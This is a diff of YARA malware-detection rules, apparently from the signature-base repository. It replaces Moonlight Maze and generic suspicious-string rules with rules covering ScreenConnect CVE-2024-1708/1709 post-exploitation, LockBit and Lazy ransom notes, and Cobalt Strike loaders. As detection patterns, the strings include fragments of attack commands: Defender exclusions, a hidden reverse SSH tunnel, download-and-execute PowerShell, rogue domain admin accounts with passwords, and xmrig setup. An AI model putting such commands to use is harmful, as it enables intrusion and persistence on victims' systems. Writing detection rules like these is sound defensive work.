-		$Auto_Close1 = {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
+		$x01 = "-c foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid}"
+		$x02 = ".msi c:\\mpyutd.msi"
+		$x03 = "/MyUserName_$env:UserName"
+		$x04 = " -OutFile C:\\Windows\\Help\\"
+		$x05 = "/Create /TN \\\\Microsoft\\\\Windows\\\\Wininet\\\\UserCache_"
+		$x06 = "$e = $r + \"ssh.exe\""
+		$x07 = "Start-Process -f $e -a $args -PassThru -WindowStyle Hidden).Id"
+		$x08 = "-R 9595:localhost:3389 -p 443 -N -oStrictHostKeyChecking=no "
+		$x09 = "chromeremotedesktophost.msi', $env:ProgramData+"
+		$x10 = "9595; iwr -UseBasicParsing "
+		$x11 = "curl  https://cmctt.]com/pub/media/wysiwyg/"
+		$x12 = ":8080/servicetest2.dll"
+		$x13 = "/msappdata.msi c:\\mpyutd.msi"
+		$x14 = "/svchost.exe -OutFile "
+		$x15 = "curl http://minish.wiki.gd"
+		$x16 = " -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile "
+		$x17 = "rundll32.exe' -Headers @"
+		$x18 = "/nssm.exe' -Headers @"
+		$x19 = "c:\\programdata\\update.dat UpdateSystem"
+		$x20 = "::size -eq 4){\\\"TVqQAA" ascii wide
+		$x21 = "::size -eq 4){\"TVqQAA" ascii wide
+		$x22 = "-nop -c [System.Reflection.Assembly]::Load(([WmiClass]'root\\cimv2:System_"
+		$xp0 = "/add default test@2021! /domain"
+		$xp1 = "/add default1 test@2021! /domain"
+		$xp2 = "oldadmin Pass8080!!"
+		$xp3 = "temp 123123qwE /add "
+		$xp4 = "oldadmin \"Pass8080!!\""
+		$xp5 = "nssm set xmrig AppDirectory "
 
 	condition:
-		filesize < 3000KB and $header_docf at 0 and $s1 and any of ( $Auto_* )
+		1 of ( $x* )
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Customlokitools : FILE
+rule SIGNATURE_BASE_SUSP_Command_Line_Combos_Feb24_2 : SCRIPT FILE
 {
 	meta:
-		description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings"
-		author = "Kaspersky Lab"
-		id = "d5795d3b-bbb1-59e9-b86d-666b5c911f3b"
-		date = "2017-03-15"
-		modified = "2017-03-22"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L11-L47"
+		description = "Detects suspicious command line combinations often found in post exploitation activities"
+		author = "Florian Roth"
+		id = "d9bc6083-c3ca-5639-a9df-483fea6d0187"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L105-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "14cce7e641d308c3a177a8abb5457019"
-		hash = "a3164d2bbc45fb1eef5fde7eb8b245ea"
-		hash = "dabee9a7ea0ddaf900ef1e3e166ffe8a"
-		hash = "1980958afffb6a9d5a6c73fc1e2795c2"
-		hash = "e59f92aadb6505f29a9f368ab803082e"
-		logic_hash = "4e1f60b045c10758354f110c3778b8ffd7f10b5e229b3f2f821287476620bec9"
+		logic_hash = "0cd7b4771aa8fd622e873c5cdc6689d24394e5faf026b36d5f228ac09f4e0441"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.1"
+		tags = "SCRIPT, FILE"
 
 	strings:
-		$a1 = "Write file Ok..." ascii wide
-		$a2 = "ERROR: Can not open socket...." ascii wide
-		$a3 = "Error in parametrs:" ascii wide
-		$a4 = "Usage: @<get/put> <IP> <PORT> <file>" ascii wide
-		$a5 = "ERROR: Not connect..." ascii wide
-		$a6 = "Connect successful...." ascii wide
-		$a7 = "clnt <%d> rqstd n ll kll" ascii wide
-		$a8 = "clnt <%d> rqstd swap" ascii wide
-		$a9 = "cld nt sgnl prcs grp" ascii wide
-		$a10 = "cld nt sgnl prnt" ascii wide
-		$a11 = "ork error" ascii fullword
+		$sa1 = " | iex"
+		$sa2 = "iwr -UseBasicParsing "
 
 	condition:
-		filesize < 5000KB and 3 of ( $a* )
+		filesize < 2MB and all of them
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Customsniffer
+rule SIGNATURE_BASE_SUSP_PS1_Combo_Transfersh_Feb24 : SCRIPT
 {
 	meta:
-		description = "Rule to detect Moonlight Maze sniffer tools"
-		author = "Kaspersky Lab"
-		id = "8cc76e4d-a956-543c-81e0-827dfdb5da1c"
-		date = "2017-03-15"
-		modified = "2023-12-05"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L50-L79"
+		description = "Detects suspicious PowerShell command that downloads content from transfer.sh as often found in loaders"
+		author = "Florian Roth"
+		id = "fd14cca5-9cf8-540b-9d6e-39ca2c267272"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L120-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7b86f40e861705d59f5206c482e1f2a5"
-		hash = "927426b558888ad680829bd34b0ad0e7"
-		logic_hash = "5ccf9035adc16393db4b3d461f7a20f86f538275d7806280a15508c15d9c805c"
-		score = 75
+		logic_hash = "64d4343ecdcbc4a28571557bec2f31c1ff73c2ecf63d0feaa0a71001bb9bf499"
+		score = 70
 		quality = 85
-		tags = ""
-		version = "1.1"
-		original_filename = "ora;tdn"
+		tags = "SCRIPT"
 
 	strings:
-		$a1 = "/var/tmp/gogo" fullword
-		$a2 = "myfilename= |%s|" fullword
-		$a3 = "mypid,mygid=" fullword
-		$a4 = "mypid=|%d| mygid=|%d|" fullword
-		$a5 = "/var/tmp/task" fullword
-		$a6 = "mydevname= |%s|" fullword
+		$x1 = ".DownloadString('https://transfer.sh"
+		$x2 = ".DownloadString(\"https://transfer.sh"
+		$x3 = "Invoke-WebRequest -Uri 'https://transfer.sh"
+		$x4 = "Invoke-WebRequest -Uri \"https://transfer.sh"
 
 	condition:
-		2 of ( $a* )
+		1 of them
 }
-rule SIGNATURE_BASE_Loki2Crypto
+rule SIGNATURE_BASE_MAL_SUSP_RANSOM_Lockbit_Ransomnote_Feb24
 {
 	meta:
-		description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */"
-		author = "Costin Raiu, Kaspersky Lab"
-		id = "d67288f8-5205-5882-8dff-041d092eea4f"
-		date = "2017-03-21"
-		modified = "2023-12-05"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L82-L106"
+		description = "Detects the LockBit ransom note file 'LockBit-DECRYPT.txt' which is a sign of a LockBit ransomware infection"
+		author = "Florian Roth"
+		id = "b2fcb2a7-49e8-520c-944f-6acd5ded579b"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L137-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "19fbd8cbfb12482e8020a887d6427315"
-		hash = "ea06b213d5924de65407e8931b1e4326"
-		hash = "14ecd5e6fc8e501037b54ca263896a11"
-		hash = "e079ec947d3d4dacb21e993b760a65dc"
-		hash = "edf900cebb70c6d1fcab0234062bfc28"
-		logic_hash = "c2315dafb0ecb9e6babd526a028835f3513218c1e667c81088c49ad13dbab5be"
+		logic_hash = "1fe07c33de1971b1f9430851dec4b8cd9f3ac7f087f0de18a2da4a390891b674"
 		score = 75
 		quality = 85
 		tags = ""
-		version = "1.0"
 
 	strings:
-		$modulus = {DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49}
+		$x1 = ">>>> Your personal DECRYPTION ID:"
 
 	condition:
-		( any of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_De_Tool
+rule SIGNATURE_BASE_MAL_SUSP_RANSOM_Lazy_Ransomnote_Feb24
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool"
-		author = "Kaspersky Lab"
-		id = "09bfebca-7cec-5514-9f48-c0c2c57efcf9"
-		date = "2017-03-27"
-		modified = "2017-03-27"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L111-L137"
+		description = "Detects the Lazy ransom note file 'HowToRestoreYourFiles.txt' which is a sign of a Lazy ransomware infection"
+		author = "Florian Roth"
+		id = "287dfd67-8d0d-5906-b593-3af42a5a3aa4"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L151-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4bc7ed168fb78f0dc688ee2be20c9703"
-		hash = "8b56e8552a74133da4bc5939b5f74243"
-		logic_hash = "f658e1aa2ddb84fe3c1de7c7c00f2148d232cf2b3381c298420abfc382c02986"
+		logic_hash = "c9416d05f0bd9aab9d6108380c1b5364f4c4e112b6e0726202f083eaacfdcf56"
 		score = 75
 		quality = 85
 		tags = ""
-		version = "1.0"
 
 	strings:
-		$a1 = "Vnuk: %d" ascii fullword
-		$a2 = "Syn: %d" ascii fullword
-		$a3 = {25 73 0A 25 73 0A 25 73 0A 25 73 0A}
+		$x1 = "All Encrypted files can be reversed to original form and become usable"
 
 	condition:
-		(( 2 of ( $a* ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Cle_Tool
+rule SIGNATURE_BASE_SUSP_MAL_Signingcert_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'cle' log cleaning tool"
-		author = "Kaspersky Lab"
-		id = "99ae07b9-eb42-53dc-bd8b-75ab6a0b8cab"
-		date = "2017-03-27"
-		modified = "2017-03-27"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L140-L167"
+		description = "Detects PE files signed with a certificate used to sign malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
+		author = "Florian Roth"
+		id = "f25ea77a-1b4e-5c13-9117-eedf0c20335a"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L166-L184"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "647d7b711f7b4434145ea30d0ef207b0"
-		logic_hash = "a4bbd7be617b944a656fa58ca9ec6384f624c95250de6b8a6ba63e7c3387484c"
+		logic_hash = "824efe1fa441322d891805df9a1637ebb44d18889572604acc125bf79a2d1083"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
+		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
+		hash1 = "37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab991aad5dd6a9c231b"
+		hash2 = "e8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2da729867935c793"
 
 	strings:
-		$a1 = "./a filename template_file" ascii wide
-		$a2 = "May be %s is empty?" ascii wide
-		$a3 = "template string = |%s|" ascii wide
-		$a4 = "No blocks !!!"
-		$a5 = "No data in this block !!!!!!" ascii wide
-		$a6 = "No good line"
+		$s1 = "Wisdom Promise Security Technology Co." ascii
+		$s2 = "Globalsign TSA for CodeSign1" ascii
+		$s3 = { 5D AC 0B 6C 02 5A 4B 21 89 4B A3 C2 }
 
 	condition:
-		(( 3 of ( $a* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 70000KB and all of them
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Xk_Keylogger
+
+rule SIGNATURE_BASE_MAL_CS_Loader_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'xk' keylogger"
-		author = "Kaspersky Lab"
-		id = "cf585cd0-afdd-5782-a6e5-bb9509cbf01d"
-		date = "2017-03-27"
-		modified = "2017-03-27"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L170-L202"
+		description = "Detects Cobalt Strike malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
+		author = "Florian Roth"
+		id = "6c9914a4-b079-5a39-9d3b-7b9a2b54dc2b"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L186-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b2acdef9c8e545f4ab217f529a7e4a3e74723b27ec89896f98639fd40792bcc8"
+		logic_hash = "ae0e25c2dda1b727978977c674e834cd659661c597d88395a6f46ad5a179e9f0"
 		score = 75
-		quality = 35
-		tags = ""
-		version = "1.0"
+		quality = 85
+		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
+		hash1 = "0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6a7ebe65bf3fdd6fe"
 
 	strings:
-		$a1 = "Log ended at => %s"
-		$a2 = "Log started at => %s [pid %d]"
-		$a3 = "/var/tmp/task" fullword
-		$a4 = "/var/tmp/taskhost" fullword
-		$a5 = "my hostname: %s"
-		$a6 = "/var/tmp/tasklog"
-		$a7 = "/var/tmp/.Xtmp01" fullword
-		$a8 = "myfilename=-%s-"
-		$a9 = "/var/tmp/taskpid"
-		$a10 = "mypid=-%d-" fullword
-		$a11 = "/var/tmp/taskgid" fullword
-		$a12 = "mygid=-%d-" fullword
+		$s1 = "Dll_x86.dll" ascii fullword
 
 	condition:
-		(( 3 of ( $a* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.exports ( "UpdateSystem" ) and ( pe.imphash ( ) == "0dc05c4c21a86d29f1c3bf9cc5b712e0" or $s1 ) )
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Encrypted_Keylog : FILE
+
+rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Indicators_Feb24 : CVE_2024_1708 CVE_2024_1709 FILE
 {
 	meta:
-		description = "Rule to detect Moonlight Maze encrypted keylogger logs"
-		author = "Kaspersky Lab"
-		id = "f0d464f0-3955-5f41-a57f-8aa225e1171d"
-		date = "2017-03-27"
-		modified = "2017-03-27"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_moonlightmaze.yar#L204-L222"
+		description = "Detects Lockbit ransomware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
+		author = "Florian Roth"
+		id = "108430c8-4fe5-58a1-b709-539b257c120c"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L208-L228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "593f6f2148ddb52e2beee72a48135cd83f126edfdb263b471432d17273e536db"
+		logic_hash = "e4cd6b1a1bc57bf25c71f6bc228f45e4a996f9d9d391aeb3dda9c7d7857610bc"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
+		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
+		hash1 = "a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0"
 
 	strings:
-		$a1 = {47 01 22 2A 6D 3E 39 2C}
+		$op1 = { 76 c1 95 8b 18 00 93 56 bf 2b 88 71 4c 34 af b1 a5 e9 77 46 c3 13 }
+		$op2 = { e0 02 10 f7 ac 75 0e 18 1b c2 c1 98 ac 46 }
+		$op3 = { 8b c6 ab 53 ff 15 e4 57 42 00 ff 45 fc eb 92 ff 75 f8 ff 15 f4 57 42 00 }
 
 	condition:
-		uint32( 0 ) == 0x2a220147 and ( $a1 at 0 )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "914685b69f2ac2ff61b6b0f1883a054d" or 2 of them ) or all of them
 }
-rule SIGNATURE_BASE_Ping_Command_In_EXE : FILE
+rule SIGNATURE_BASE_MAL_MSI_Mpyutils_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
 {
 	meta:
-		description = "Detects an suspicious ping command execution in an executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "937ab622-fbcf-5a31-a3ff-af2584484140"
-		date = "2016-11-03"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L2-L15"
+		description = "Detects malicious MSI package mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
+		author = "Florian Roth"
+		id = "e7794336-a325-5b92-8c25-81ed9cb28044"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L230-L247"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1ea24774471eade7b7c50f0eae520e2b30dbec693e162b83ab0074465f179372"
-		score = 60
+		logic_hash = "ba20db486e5d3c29c9702e10628fb3c0e55e52bbec74e3a86ed6511a6475b82f"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
+		hash1 = "8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600"
 
 	strings:
-		$x1 = "cmd /c ping 127.0.0.1 -n " ascii
+		$s1 = "crypt64ult.exe" ascii fullword
+		$s2 = "EXPAND.EXE" wide fullword
+		$s6 = "ICACLS.EXE" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0xcfd0 and filesize < 20000KB and all of them
 }
-rule SIGNATURE_BASE_Googlebot_Useragent : FILE
+rule SIGNATURE_BASE_MAL_Beacon_Unknown_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
 {
 	meta:
-		description = "Detects the GoogleBot UserAgent String in an Executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "621532ac-fc0b-5118-84b0-eac110693320"
-		date = "2017-01-27"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L17-L32"
+		description = "Detects malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709 "
+		author = "Florian Roth"
+		id = "9299fd44-5327-5a73-8299-108b710cb16e"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L249-L268"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa6cc3625d3740b91d7f1193cea0bdb621ae9445e42300123b01e322f715b976"
-		score = 65
+		logic_hash = "fd6ebc6676d677d6bc19398026eee7b7d2f9727ba7a3c79d1e970a6dc19548aa"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
+		hash1 = "6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e70f6307aae21f9090"
+		hash2 = "b0adf3d58fa354dbaac6a2047b6e30bc07a5460f71db5f5975ba7b96de986243"
+		hash3 = "c0f7970bed203a5f8b2eca8929b4e80ba5c3276206da38c4e0a4445f648f3cec"
 
 	strings:
-		$x1 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" fullword ascii
-		$fp1 = "McAfee, Inc." wide
+		$s1 = "Driver.dll" wide fullword
+		$s2 = "X l.dlT" ascii fullword
+		$s3 = "$928c7481-dd27-8e23-f829-4819aefc728c" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and $x1 and not 1 of ( $fp* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of ( $s* )
 }
-rule SIGNATURE_BASE_Gen_Net_Localgroup_Administrators_Add_Command : FILE
+rule SIGNATURE_BASE_EXP_Libre_Office_CVE_2018_16858 : CVE_2018_16858 FILE
 {
 	meta:
-		description = "Detects an executable that contains a command to add a user account to the local administrators group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f6095fc-6d9f-5814-b407-f320191fd912"
-		date = "2017-07-08"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L34-L46"
+		description = "RCE in Libre Office with crafted ODT file (CVE-2018-16858)"
+		author = "John Lambert @JohnLaTwC / modified by Florian Roth"
+		id = "17a0a569-27bf-57ab-937e-8943442ae604"
+		date = "2019-02-01"
+		modified = "2023-12-05"
+		reference = "https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2018_16858.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "af4d7c8586022583e2019bbdc3638704e1d237b25e3c214f3bc2db64c58c8bd3"
+		hash = "95a02b70c117947ff989e3e00868c2185142df9be751a3fefe21f18fa16a1a6f"
+		logic_hash = "6dd34350f24945ba5a594acae96dc00bb200841a645443a70a59006cea1db949"
 		score = 75
-		quality = 60
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 83
+		tags = "CVE-2018-16858, FILE"
 
 	strings:
-		$x1 = /net localgroup administrators [a-zA-Z0-9]{1,16} \/add/ nocase ascii
+		$s1 = "xlink:href=\"vnd.sun.star.script:" ascii nocase
+		$s2 = ".py$tempfilepager" ascii nocase
+		$tag = {3c 6f 66 66 69 63 65 3a 64 6f 63 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
+		uint32be( 0 ) == 0x3c3f786d and $tag in ( 0 .. 0100 ) and all of ( $s* )
 }
-rule SIGNATURE_BASE_Suspicious_Script_Running_From_HTTP
+rule SIGNATURE_BASE_MAL_Avemaria_RAT_Jul19 : FILE
 {
 	meta:
-		description = "Detects a suspicious "
+		description = "Detects AveMaria RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ba84e9c-a32b-5f66-8d50-75344599cafc"
-		date = "2017-08-20"
-		modified = "2025-03-21"
-		reference = "https://www.hybrid-analysis.com/sample/a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218a35?environmentId=100"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L48-L64"
+		id = "960048cf-7a56-50cf-8498-549f900770d8"
+		date = "2019-07-01"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/abuse_ch/status/1145697917161934856"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_avemaria_rat.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "49ead238b9153886ddbcfe37939628fd848283373e2807797d0849559ebecf6c"
-		score = 50
+		logic_hash = "a848ec579db6a07faeab5c855a56889b4bfeaa2958d0388f7fe8c6dcdea7e457"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "5a927db1566468f23803746ba0ccc9235c79ca8672b1444822631ddbf2651a59"
 
 	strings:
-		$s1 = "cmd /C script:http://" ascii nocase
-		$s2 = "cmd /C script:https://" ascii nocase
-		$s3 = "cmd.exe /C script:http://" ascii nocase
-		$s4 = "cmd.exe /C script:https://" ascii nocase
+		$a1 = "operator co_await" fullword ascii
+		$s1 = "uohlyatqn" fullword ascii
+		$s2 = "index = [%d][%d][%d][%d]" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_Reconcommands_In_File : FILE
+rule SIGNATURE_BASE_Fareit_Trojan_Oct15 : FILE
 {
 	meta:
-		description = "Detects various recon commands in a single file"
+		description = "Detects Fareit Trojan from Sep/Oct 2015 Wave"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62d59913-5dbd-512c-98ea-044bbb9ac2da"
-		date = "2017-12-11"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/haroonmeer/status/939099379834658817"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L66-L86"
+		id = "725abb2a-7675-51b5-aed8-594e4826a6b4"
+		date = "2015-10-18"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/5VYtlU"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fareit.yar#L8-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "73b4bcf76f42a6bf9c3d9dfe3f4e754ce2856e03a47cfd35388d47290209e65d"
-		score = 40
+		logic_hash = "ef47e81483d5edf67d489a9a35ce56667e293350534e780d7d93b1fbc5f7113a"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "230ca0beba8ae712cfe578d2b8ec9581ce149a62486bef209b04eb11d8c088c3"
+		hash2 = "3477d6bfd8313d37fedbd3d6ba74681dd7cb59040cabc2991655bdce95a2a997"
+		hash3 = "408fa0bd4d44de2940605986b554e8dab42f5d28a6a525b4bc41285e37ab488d"
+		hash4 = "76669cbe6a6aac4aa52dbe9d2e027ba184bf3f0b425f478e8c049637624b5dae"
+		hash5 = "9486b73eac92497e703615479d52c85cfb772b4ca6c846ef317729910e7c545f"
